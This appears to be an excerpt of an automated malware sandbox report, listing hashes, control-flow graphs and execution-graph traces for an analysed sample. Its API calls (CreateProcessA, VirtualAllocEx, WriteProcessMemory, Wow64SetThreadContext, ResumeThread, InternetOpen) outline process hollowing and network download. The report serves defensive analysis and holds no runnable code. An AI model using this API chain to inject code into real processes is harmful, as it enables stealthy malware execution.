                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: FileInternetRead
                      • String ID:
                      • API String ID: 778332206-0
                      • Opcode ID: 43eec9f65d98945128768a340ab86e63e9b4b37bb8b45909e53033e15d5388b6
                      • Instruction ID: bae98a825450f4ca45505abcf5ad011ab89ba8ed00a52bb1bcfe7cba91d29d39
                      • Opcode Fuzzy Hash: 43eec9f65d98945128768a340ab86e63e9b4b37bb8b45909e53033e15d5388b6
                      • Instruction Fuzzy Hash: A4512870918A1C8FDF58DF58C889BE9BBF0FB69311F1041AED049A3251DB70A985CF85

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: InternetOpen
                      • String ID:
                      • API String ID: 2038078732-0
                      • Opcode ID: d9630f56b916c5649fa14d619c4d1edd9128de386f892426acbb397084cbe2f7
                      • Instruction ID: 8a081725a34d6086da0abf0f73247e3faf295773daa00531d68f6d374b71de14
                      • Opcode Fuzzy Hash: d9630f56b916c5649fa14d619c4d1edd9128de386f892426acbb397084cbe2f7
                      • Instruction Fuzzy Hash: 85812230908A5D8FDB98EF58C858BE9BBF1FB69311F1001AED04EE3651DB75A985CB40

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: InternetOpen
                      • String ID:
                      • API String ID: 2038078732-0
                      • Opcode ID: 68279a6220005ad1986be44c93e84e8675abeaa3d8dc48265048fe3ee3f27306
                      • Instruction ID: 9e9cdc4408bc36883f73f2968cd86d1aad8998eeb3027e96b95371d938775a09
                      • Opcode Fuzzy Hash: 68279a6220005ad1986be44c93e84e8675abeaa3d8dc48265048fe3ee3f27306
                      • Instruction Fuzzy Hash: 4A810270908A5D8FDB98EF58C894BE9BBF1FB69311F1001AED00EE3651DB75A984CB44

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: InternetOpen
                      • String ID:
                      • API String ID: 2038078732-0
                      • Opcode ID: 15370d23c4abb204de2203472b5085cffdc26da06b3afc6a9f0352b6fe081586
                      • Instruction ID: 6a539b57c787ae8ee1733b7ca9070e4d8d98ea90b03b1a3a712801cacce0cfdb
                      • Opcode Fuzzy Hash: 15370d23c4abb204de2203472b5085cffdc26da06b3afc6a9f0352b6fe081586
                      • Instruction Fuzzy Hash: C3710F70908A1D8FDB98EF58C848BE9BBF1FB69311F1041AED00EE3651DB75A985CB44

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: InternetOpen
                      • String ID:
                      • API String ID: 2038078732-0
                      • Opcode ID: 36ca272c28c78c364d769d775a7d0e894865718eea76e71ceefcd6eb429d43a9
                      • Instruction ID: 43a000d04648f44233462f6c01b0d4bb9617bc9007200edcd71648aa57738686
                      • Opcode Fuzzy Hash: 36ca272c28c78c364d769d775a7d0e894865718eea76e71ceefcd6eb429d43a9
                      • Instruction Fuzzy Hash: 0671E170908A5D8FDB98EF58C884BE9BBF1FB69301F1041AED00EE3651DB75A984CB44

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: fdf8220a4295eb763312dc090dce55b4a6d4b41adbab16aa206104be798aee08
                      • Instruction ID: 22fa2f898c9f2a6acdf2712150c4b4f4350430b92236e9a1fa1938ac7a8f4308
                      • Opcode Fuzzy Hash: fdf8220a4295eb763312dc090dce55b4a6d4b41adbab16aa206104be798aee08
                      • Instruction Fuzzy Hash: 7E611770908A1D8FDB94EF58C885BE9BBF1FB69310F1082AAD44DE3255DB34A985CF40

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: FileInternetRead
                      • String ID:
                      • API String ID: 778332206-0
                      • Opcode ID: 317499834e13b768b523e5997dae42a31da9b03a2378d8c7e211020ade1b2e0d
                      • Instruction ID: e24b29e25c4b7122e824f70e4023d8409c58b46f9ce4fb4813d11b930c3f85be
                      • Opcode Fuzzy Hash: 317499834e13b768b523e5997dae42a31da9b03a2378d8c7e211020ade1b2e0d
                      • Instruction Fuzzy Hash: 85613870908A5C8FDF58DF58C889BE9BBF0FB29311F1042AED449A3651DB70A985CF85

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 87 7ff848d75f85-7ff848d75f91 88 7ff848d75f9c-7ff848d760d9 VirtualAllocEx 87->88 89 7ff848d75f93-7ff848d75f9b 87->89 94 7ff848d760db 88->94 95 7ff848d760e1-7ff848d7614d 88->95 89->88 94->95
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 117f47cf5b101d0099d27b6ccd6ab3eb1ff89560d0b03fa75f946914ff52624d
                      • Instruction ID: 1900cf56b6537c2e387369360d6d03e7ef73b59fa663881cc7ad945ba384edc3
                      • Opcode Fuzzy Hash: 117f47cf5b101d0099d27b6ccd6ab3eb1ff89560d0b03fa75f946914ff52624d
                      • Instruction Fuzzy Hash: 0E513A70908A5C8FDF94EF58C845BE9BBF1FB6A310F1081AAD04DE3251CB35A985CB41

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 98 7ff848d7635d-7ff848d76369 99 7ff848d7636b-7ff848d76373 98->99 100 7ff848d76374-7ff848d764af ReadProcessMemory 98->100 99->100 105 7ff848d764b7-7ff848d76519 100->105 106 7ff848d764b1 100->106 106->105
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 89cbfe29780378b3dfda3b87de5aed795e15d1853c915c74270fe1623355c54d
                      • Instruction ID: a99fd691dd1c609b827aea1770afd1c02bb828aca1ab2a45c0ec269d44f3a537
                      • Opcode Fuzzy Hash: 89cbfe29780378b3dfda3b87de5aed795e15d1853c915c74270fe1623355c54d
                      • Instruction Fuzzy Hash: DE513670D08A5C8FDB94EF58C885BE9BBF1FB69310F1082AAD44DE3251DB74A985CB44

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 109 7ff848d7599b-7ff848d75aa4 CreateProcessA 114 7ff848d75aac-7ff848d75b99 call 7ff848d75bb5 109->114 115 7ff848d75aa6 109->115 127 7ff848d75b9b 114->127 128 7ff848d75ba0-7ff848d75bb4 114->128 115->114 127->128
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 34258d853aca90de8f555c7a890ce5a7f64ba8b819c72b034dc0924c14d69f32
                      • Instruction ID: 2ee469423a274a862d8313e907f301b9ae62257f524a50fa1b6cfc7b61f45d43
                      • Opcode Fuzzy Hash: 34258d853aca90de8f555c7a890ce5a7f64ba8b819c72b034dc0924c14d69f32
                      • Instruction Fuzzy Hash: 4F511930909A8D8FEBB8EF18C895BE977E1FF59340F40412AD84DCB252DB34A645CB45

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 129 7ff848d75c8e-7ff848d75c9b 130 7ff848d75c9d-7ff848d75ca5 129->130 131 7ff848d75ca6-7ff848d75d62 129->131 130->131 134 7ff848d75d84-7ff848d75de6 Wow64SetThreadContext 131->134 135 7ff848d75d64-7ff848d75d81 131->135 137 7ff848d75dee-7ff848d75e44 134->137 138 7ff848d75de8 134->138 135->134 138->137
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 7ae359a466e9234b098b5de913eb60e8d602ab33a3bd14784078a53cdd597b2e
                      • Instruction ID: 0c6e46417eaa68fc20922f62571289f51a22bf2371e7d3aa5ca1eaaa7bff3f28
                      • Opcode Fuzzy Hash: 7ae359a466e9234b098b5de913eb60e8d602ab33a3bd14784078a53cdd597b2e
                      • Instruction Fuzzy Hash: 5C516C70C0964D8FEB55EFA8C849BE9BBF1FB69310F1082AAD048D7256DB74A485CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 141 7ff848d75e49-7ff848d75e55 142 7ff848d75e57-7ff848d75e5f 141->142 143 7ff848d75e60-7ff848d75f30 ResumeThread 141->143 142->143 148 7ff848d75f38-7ff848d75f82 143->148 149 7ff848d75f32 143->149 149->148
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130612369.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff848d70000_d34e1p5zD2.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 122f2d5ffcafaec83bbfd7bb1d4282ed4485d40ad537964abf7355850d70ca11
                      • Instruction ID: 2dd70d96055bd3459f4a9133fb758edbee75ca783a602939fb0b55d9cbcd50da
                      • Opcode Fuzzy Hash: 122f2d5ffcafaec83bbfd7bb1d4282ed4485d40ad537964abf7355850d70ca11
                      • Instruction Fuzzy Hash: 9C415830D0964D8FEB98EFA8C885AEDBBF0FF56310F1041AAD049E7252DB34A485CB41

                      Execution Graph

                      Execution Coverage:19.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:27.9%
                      Total number of Nodes:484
                      Total number of Limit Nodes:57
                      execution_graph 46212 5c03290 46213 5c032b4 46212->46213 46214 5c032c9 46213->46214 46225 5c09c9b 46213->46225 46232 5c06598 46213->46232 46236 5c07538 46213->46236 46240 5c0cff0 46213->46240 46244 5c0bd70 46213->46244 46252 5c07529 46213->46252 46256 5c06588 46213->46256 46260 5c09ca8 46213->46260 46267 5c0d000 46213->46267 46271 5c0bd60 46213->46271 46226 5c09ca8 46225->46226 46279 5c0a7a0 46226->46279 46284 5c0a79e 46226->46284 46289 5c0a7a9 46226->46289 46294 5c0a0a8 46226->46294 46227 5c09d46 46227->46214 46233 5c065c2 46232->46233 46326 5c06868 46233->46326 46234 5c0662f 46234->46214 46237 5c07562 46236->46237 46346 5c07770 46237->46346 46241 5c0d024 LdrInitializeThunk 46240->46241 46243 5c0d0a5 46241->46243 46243->46214 46245 5c0bd9a 46244->46245 46374 5c0c4b1 46245->46374 46379 5c0c108 46245->46379 46384 5c0c4a8 46245->46384 46389 5c0c4d7 46245->46389 46394 5c0c4a6 46245->46394 46246 5c0be00 46246->46214 46253 5c07538 46252->46253 46255 5c07770 3 API calls 46253->46255 46254 5c075cf 46254->46214 46255->46254 46257 5c065c2 46256->46257 46259 5c06868 4 API calls 46257->46259 46258 5c0662f 46258->46214 46259->46258 46261 5c09cd2 46260->46261 46263 5c0a7a0 LdrInitializeThunk 46261->46263 46264 5c0a0a8 6 API calls 46261->46264 46265 5c0a7a9 LdrInitializeThunk 46261->46265 46266 5c0a79e LdrInitializeThunk 46261->46266 46262 5c09d46 46262->46214 46263->46262 46264->46262 46265->46262 46266->46262 46268 5c0d024 LdrInitializeThunk 46267->46268 46270 5c0d0a5 46268->46270 46270->46214 46272 5c0bd69 46271->46272 46274 5c0c4b1 LdrInitializeThunk 46272->46274 46275 5c0c4a6 LdrInitializeThunk 46272->46275 46276 5c0c4d7 LdrInitializeThunk 46272->46276 46277 5c0c4a8 LdrInitializeThunk 46272->46277 46278 5c0c108 LdrInitializeThunk 46272->46278 46273 5c0be00 46273->46214 46274->46273 46275->46273 46276->46273 46277->46273 46278->46273 46281 5c0a2b1 46279->46281 46280 5c0a7db 46280->46227 46281->46280 46282 5c0a2da LdrInitializeThunk 46281->46282 46283 5c0a32d 46282->46283 46285 5c0a2b1 46284->46285 46286 5c0a7db 46285->46286 46287 5c0a2da LdrInitializeThunk 46285->46287 46286->46227 46288 5c0a32d 46287->46288 46290 5c0a2b1 46289->46290 46291 5c0a7db 46290->46291 46292 5c0a2da LdrInitializeThunk 46290->46292 46291->46227 46293 5c0a32d 46292->46293 46295 5c0a038 46294->46295 46296 5c0a0b6 46294->46296 46295->46227 46306 5c0a9b8 46296->46306 46310 5c0a9c8 46296->46310 46314 5c0abb7 46296->46314 46318 5c0abc2 46296->46318 46322 5c0abb9 46296->46322 46297 5c0a211 46298 5c0a7f5 46297->46298 46299 5c0a2da LdrInitializeThunk 46297->46299 46298->46227 46300 5c0a32d 46299->46300 46309 5c0a9e4 46306->46309 46307 5c0abe1 46307->46297 46308 5c0aa94 LdrInitializeThunk 46308->46309 46309->46307 46309->46308 46313 5c0a9e4 46310->46313 46311 5c0abe1 46311->46297 46312 5c0aa94 LdrInitializeThunk 46312->46313 46313->46311 46313->46312 46317 5c0aa6e 46314->46317 46315 5c0abe1 46315->46297 46316 5c0aa94 LdrInitializeThunk 46316->46317 46317->46315 46317->46316 46320 5c0aa6e 46318->46320 46319 5c0abe1 46319->46297 46320->46319 46321 5c0aa94 LdrInitializeThunk 46320->46321 46321->46320 46324 5c0aa6e 46322->46324 46323 5c0abe1 46323->46297 46324->46323 46325 5c0aa94 LdrInitializeThunk 46324->46325 46325->46324 46328 5c06872 46326->46328 46327 5c06876 46327->46234 46328->46327 46332 5c07150 46328->46332 46339 5c07160 46328->46339 46329 5c069c7 46329->46234 46333 5c071a7 LdrInitializeThunk 46332->46333 46338 5c0717c 46332->46338 46335 5c072f1 46333->46335 46336 5c073e6 LdrInitializeThunk 46335->46336 46337 5c073ca 46335->46337 46336->46337 46337->46329 46338->46329 46340 5c0717c 46339->46340 46341 5c071a7 LdrInitializeThunk 46339->46341 46340->46329 46343 5c072f1 46341->46343 46344 5c073e6 LdrInitializeThunk 46343->46344 46345 5c073ca 46343->46345 46344->46345 46345->46329 46347 5c0779a 46346->46347 46351 5c07f00 46347->46351 46355 5c07f10 46347->46355 46348 5c075cf 46348->46214 46352 5c07f4d 46351->46352 46353 5c07fa3 46352->46353 46359 5c07fb8 46352->46359 46353->46348 46357 5c07f24 46355->46357 46356 5c07fa3 46356->46348 46357->46356 46358 5c07fb8 3 API calls 46357->46358 46358->46357 46360 5c07ff5 46359->46360 46361 5c08377 46360->46361 46366 5c08590 46360->46366 46370 5c085a0 46360->46370 46362 5c084dd 46361->46362 46363 5c08402 LdrInitializeThunk 46361->46363 46362->46352 46363->46361 46369 5c085c7 46366->46369 46367 5c08717 46367->46360 46368 5c08669 LdrInitializeThunk 46368->46369 46369->46367 46369->46368 46372 5c085c7 46370->46372 46371 5c08717 46371->46360 46372->46371 46373 5c08669 LdrInitializeThunk 46372->46373 46373->46372 46376 5c0c222 46374->46376 46375 5c0c4d3 46375->46246 46376->46375 46377 5c0c248 LdrInitializeThunk 46376->46377 46378 5c0c282 46377->46378 46380 5c0c142 46379->46380 46381 5c0c4f3 46380->46381 46382 5c0c248 LdrInitializeThunk 46380->46382 46381->46246 46383 5c0c282 46382->46383 46385 5c0c222 46384->46385 46386 5c0c4d3 46385->46386 46387 5c0c248 LdrInitializeThunk 46385->46387 46386->46246 46388 5c0c282 46387->46388 46390 5c0c222 46389->46390 46391 5c0c248 LdrInitializeThunk 46390->46391 46392 5c0c4f3 46390->46392 46393 5c0c282 46391->46393 46392->46246 46395 5c0c222 46394->46395 46396 5c0c4d3 46395->46396 46397 5c0c248 LdrInitializeThunk 46395->46397 46396->46246 46398 5c0c282 46397->46398 46398->46398 46399 11b32c8 46400 11b32ec 46399->46400 46402 11b3301 46400->46402 46407 11bd6f8 46400->46407 46411 11bab20 46400->46411 46418 11bd9ad 46400->46418 46422 11bd708 46400->46422 46426 11bab10 46400->46426 46408 11bd707 46407->46408 46433 11bf2a9 46408->46433 46409 11bda79 46409->46402 46412 11bab4d 46411->46412 46468 11bc803 46412->46468 46473 11bc38f 46412->46473 46478 11bc779 46412->46478 46483 11bc7b2 46412->46483 46419 11bd837 46418->46419 46421 11bf2a9 4 API calls 46419->46421 46420 11bda79 46420->46402 46421->46420 46423 11bd732 46422->46423 46425 11bf2a9 4 API calls 46423->46425 46424 11bda79 46424->46402 46425->46424 46427 11bab1f 46426->46427 46429 11bc779 10 API calls 46427->46429 46430 11bc38f 10 API calls 46427->46430 46431 11bc803 10 API calls 46427->46431 46432 11bc7b2 10 API calls 46427->46432 46428 11babac 46429->46428 46430->46428 46431->46428 46432->46428 46434 11bf2cf 46433->46434 46438 11bf2f9 46434->46438 46445 11bf308 46434->46445 46435 11bf2e0 46435->46409 46439 11bf324 46438->46439 46452 5c00c57 46439->46452 46456 5c00e59 46439->46456 46460 5c00c68 46439->46460 46464 5c00e57 46439->46464 46440 11bf386 46440->46435 46446 11bf324 46445->46446 46448 5c00c57 LdrInitializeThunk 46446->46448 46449 5c00e57 LdrInitializeThunk 46446->46449 46450 5c00c68 LdrInitializeThunk 46446->46450 46451 5c00e59 LdrInitializeThunk 46446->46451 46447 11bf386 46447->46435 46448->46447 46449->46447 46450->46447 46451->46447 46453 5c00c66 46452->46453 46454 5c00d54 LdrInitializeThunk 46453->46454 46455 5c00e81 46453->46455 46454->46453 46455->46440 46457 5c00d2e 46456->46457 46458 5c00d54 LdrInitializeThunk 46457->46458 46459 5c00e81 46457->46459 46458->46457 46459->46440 46461 5c00c7e 46460->46461 46462 5c00d54 LdrInitializeThunk 46461->46462 46463 5c00e81 46461->46463 46462->46461 46463->46440 46467 5c00d2e 46464->46467 46465 5c00d54 LdrInitializeThunk 46465->46467 46466 5c00e81 46466->46440 46467->46465 46467->46466 46470 11bc51f 46468->46470 46469 11bc973 46469->46469 46470->46469 46488 11bd698 46470->46488 46493 11bd6a8 46470->46493 46474 11bc3cd 46473->46474 46475 11bc973 46474->46475 46476 11bd698 10 API calls 46474->46476 46477 11bd6a8 10 API calls 46474->46477 46475->46475 46476->46474 46477->46474 46479 11bc51f 46478->46479 46480 11bc973 46479->46480 46481 11bd698 10 API calls 46479->46481 46482 11bd6a8 10 API calls 46479->46482 46480->46480 46481->46479 46482->46479 46485 11bc51f 46483->46485 46484 11bc973 46484->46484 46485->46484 46486 11bd698 10 API calls 46485->46486 46487 11bd6a8 10 API calls 46485->46487 46486->46485 46487->46485 46489 11bd6bd 46488->46489 46498 11bde4c 46489->46498 46503 11bdd72 46489->46503 46490 11bd6eb 46490->46470 46494 11bd6bd 46493->46494 46496 11bde4c 4 API calls 46494->46496 46497 11bdd72 10 API calls 46494->46497 46495 11bd6eb 46495->46470 46496->46495 46497->46495 46499 11bde60 46498->46499 46500 11be0e9 46499->46500 46511 5c03780 46499->46511 46515 5c03790 46499->46515 46500->46490 46504 11bddb4 46503->46504 46505 11bde37 46504->46505 46550 11beb90 46504->46550 46564 11beb80 46504->46564 46506 11be0e9 46505->46506 46509 5c03780 4 API calls 46505->46509 46510 5c03790 4 API calls 46505->46510 46506->46490 46509->46506 46510->46506 46512 5c03790 46511->46512 46519 5c04420 46512->46519 46516 5c037c4 46515->46516 46518 5c04420 4 API calls 46516->46518 46517 5c03a68 46517->46500 46518->46517 46520 5c04425 46519->46520 46524 5c044c8 46520->46524 46528 5c044b8 46520->46528 46521 5c03a68 46521->46500 46525 5c044eb 46524->46525 46532 5c048c2 46525->46532 46526 5c0451a 46526->46521 46529 5c044eb 46528->46529 46531 5c048c2 4 API calls 46529->46531 46530 5c0451a 46530->46521 46531->46530 46534 5c048fc 46532->46534 46533 5c049de 46533->46526 46534->46533 46537 5c05208 46534->46537 46541 5c051f9 46534->46541 46538 5c05233 46537->46538 46545 5c05749 46538->46545 46539 5c053ab 46539->46533 46542 5c05233 46541->46542 46544 5c05749 4 API calls 46542->46544 46543 5c053ab 46543->46533 46544->46543 46546 5c05785 46545->46546 46547 5c05bd1 46546->46547 46548 5c05d90 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 46546->46548 46549 5c05da0 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 46546->46549 46547->46539 46548->46547 46549->46547 46551 11bebb4 46550->46551 46578 5c00040 46551->46578 46595 5c00007 46551->46595 46552 11bec4c 46612 5c01850 46552->46612 46632 5c01840 46552->46632 46553 11becba 46558 5c01840 4 API calls 46553->46558 46559 5c01850 4 API calls 46553->46559 46554 11bed28 46556 5c01840 4 API calls 46554->46556 46557 5c01850 4 API calls 46554->46557 46555 11bed96 46555->46505 46556->46555 46557->46555 46558->46554 46559->46554 46565 11beb90 46564->46565 46576 5c00040 6 API calls 46565->46576 46577 5c00007 6 API calls 46565->46577 46566 11bec4c 46570 5c01840 4 API calls 46566->46570 46571 5c01850 4 API calls 46566->46571 46567 11becba 46574 5c01840 4 API calls 46567->46574 46575 5c01850 4 API calls 46567->46575 46568 11bed28 46572 5c01840 4 API calls 46568->46572 46573 5c01850 4 API calls 46568->46573 46569 11bed96 46569->46505 46570->46567 46571->46567 46572->46569 46573->46569 46574->46568 46575->46568 46576->46566 46577->46566 46579 5c00073 46578->46579 46652 5c00fe0 46579->46652 46655 5c00fd8 46579->46655 46580 5c0011d 46583 5c0013f 46580->46583 46659 5c01160 46580->46659 46663 5c01168 46580->46663 46581 5c001ff 46581->46583 46666 5c0145a 46581->46666 46670 5c01460 46581->46670 46582 5c00396 46582->46583 46591 5c01460 NtWow64ReadVirtualMemory64 46582->46591 46592 5c0145a NtWow64ReadVirtualMemory64 46582->46592 46583->46552 46584 5c0061d 46584->46583 46585 5c01460 NtWow64ReadVirtualMemory64 46584->46585 46586 5c0145a NtWow64ReadVirtualMemory64 46584->46586 46585->46584 46586->46584 46591->46584 46592->46584 46596 5c00040 46595->46596 46604 5c00fe0 DuplicateHandle 46596->46604 46605 5c00fd8 DuplicateHandle 46596->46605 46597 5c0011d 46600 5c0013f 46597->46600 46610 5c01160 NtWow64QueryInformationProcess64 46597->46610 46611 5c01168 NtWow64QueryInformationProcess64 46597->46611 46598 5c001ff 46598->46600 46606 5c01460 NtWow64ReadVirtualMemory64 46598->46606 46607 5c0145a NtWow64ReadVirtualMemory64 46598->46607 46599 5c00396 46599->46600 46608 5c01460 NtWow64ReadVirtualMemory64 46599->46608 46609 5c0145a NtWow64ReadVirtualMemory64 46599->46609 46600->46552 46601 5c0061d 46601->46600 46602 5c01460 NtWow64ReadVirtualMemory64 46601->46602 46603 5c0145a NtWow64ReadVirtualMemory64 46601->46603 46602->46601 46603->46601 46604->46597 46605->46597 46606->46599 46607->46599 46608->46601 46609->46601 46610->46598 46611->46598 46613 5c01883 46612->46613 46620 5c00fe0 DuplicateHandle 46613->46620 46621 5c00fd8 DuplicateHandle 46613->46621 46614 5c01981 46618 5c019a3 46614->46618 46628 5c01460 NtWow64ReadVirtualMemory64 46614->46628 46629 5c0145a NtWow64ReadVirtualMemory64 46614->46629 46615 5c01af6 46615->46618 46622 5c01460 NtWow64ReadVirtualMemory64 46615->46622 46623 5c0145a NtWow64ReadVirtualMemory64 46615->46623 46616 5c01d8a 46617 5c01fff 46616->46617 46616->46618 46630 5c01460 NtWow64ReadVirtualMemory64 46616->46630 46631 5c0145a NtWow64ReadVirtualMemory64 46616->46631 46617->46618 46619 5c02668 46617->46619 46626 5c01460 NtWow64ReadVirtualMemory64 46617->46626 46627 5c0145a NtWow64ReadVirtualMemory64 46617->46627 46618->46553 46619->46618 46624 5c01460 NtWow64ReadVirtualMemory64 46619->46624 46625 5c0145a NtWow64ReadVirtualMemory64 46619->46625 46620->46614 46621->46614 46622->46616 46623->46616 46624->46619 46625->46619 46626->46617 46627->46617 46628->46615 46629->46615 46630->46617 46631->46617 46633 5c01850 46632->46633 46640 5c00fe0 DuplicateHandle 46633->46640 46641 5c00fd8 DuplicateHandle 46633->46641 46634 5c01981 46638 5c019a3 46634->46638 46648 5c01460 NtWow64ReadVirtualMemory64 46634->46648 46649 5c0145a NtWow64ReadVirtualMemory64 46634->46649 46635 5c01af6 46635->46638 46642 5c01460 NtWow64ReadVirtualMemory64 46635->46642 46643 5c0145a NtWow64ReadVirtualMemory64 46635->46643 46636 5c01d8a 46637 5c01fff 46636->46637 46636->46638 46650 5c01460 NtWow64ReadVirtualMemory64 46636->46650 46651 5c0145a NtWow64ReadVirtualMemory64 46636->46651 46637->46638 46639 5c02668 46637->46639 46646 5c01460 NtWow64ReadVirtualMemory64 46637->46646 46647 5c0145a NtWow64ReadVirtualMemory64 46637->46647 46638->46553 46639->46638 46644 5c01460 NtWow64ReadVirtualMemory64 46639->46644 46645 5c0145a NtWow64ReadVirtualMemory64 46639->46645 46640->46634 46641->46634 46642->46636 46643->46636 46644->46639 46645->46639 46646->46637 46647->46637 46648->46635 46649->46635 46650->46637 46651->46637 46653 5c0102d DuplicateHandle 46652->46653 46654 5c010c2 46653->46654 46654->46580 46656 5c00fe0 DuplicateHandle 46655->46656 46658 5c010c2 46656->46658 46658->46580 46660 5c01168 NtWow64QueryInformationProcess64 46659->46660 46662 5c0122e 46660->46662 46662->46581 46664 5c011b8 NtWow64QueryInformationProcess64 46663->46664 46665 5c0122e 46664->46665 46665->46581 46667 5c01460 NtWow64ReadVirtualMemory64 46666->46667 46669 5c01535 46667->46669 46669->46582 46671 5c014ad NtWow64ReadVirtualMemory64 46670->46671 46672 5c01535 46671->46672 46672->46582 46165 5c03348 46166 5c03390 RtlCreateHeap 46165->46166 46167 5c03411 46166->46167 46172 5d0d748 46173 5d0d78e 46172->46173 46177 5d0d928 46173->46177 46180 5d0d917 46173->46180 46174 5d0d87b 46179 5d0d956 46177->46179 46185 5d0d324 46177->46185 46179->46174 46181 5d0d922 46180->46181 46184 5d0d8d0 46180->46184 46182 5d0d324 DuplicateHandle 46181->46182 46183 5d0d956 46182->46183 46183->46174 46184->46174 46186 5d0d990 DuplicateHandle 46185->46186 46187 5d0da6d 46186->46187 46187->46179 46673 5d08788 46674 5d087a2 46673->46674 46678 5d087d0 46674->46678 46684 5d087e0 46674->46684 46675 5d087b4 46679 5d087e8 46678->46679 46680 5d087fc 46679->46680 46690 5d08828 46679->46690 46695 5d08819 46679->46695 46680->46675 46681 5d08811 46681->46675 46686 5d087e8 46684->46686 46685 5d087fc 46685->46675 46686->46685 46688 5d08828 2 API calls 46686->46688 46689 5d08819 2 API calls 46686->46689 46687 5d08811 46687->46675 46688->46687 46689->46687 46691 5d0883a 46690->46691 46692 5d0885b 46691->46692 46700 5d08e68 46691->46700 46709 5d08e59 46691->46709 46692->46681 46696 5d08828 46695->46696 46697 5d0885b 46696->46697 46698 5d08e68 2 API calls 46696->46698 46699 5d08e59 2 API calls 46696->46699 46697->46681 46698->46697 46699->46697 46701 5d08e80 46700->46701 46702 5d08e95 46701->46702 46718 5d0a7c8 46701->46718 46722 5d0a7ba 46701->46722 46704 5d08e99 46702->46704 46725 5d0e0d5 46702->46725 46729 5d0e0d8 46702->46729 46703 5d08eb7 46703->46692 46704->46692 46710 5d08e68 46709->46710 46713 5d08e95 46710->46713 46714 5d0a7c8 OleInitialize 46710->46714 46715 5d0a7ba OleInitialize 46710->46715 46711 5d08eb7 46711->46692 46712 5d08e99 46712->46692 46713->46712 46716 5d0e0d5 OleGetClipboard 46713->46716 46717 5d0e0d8 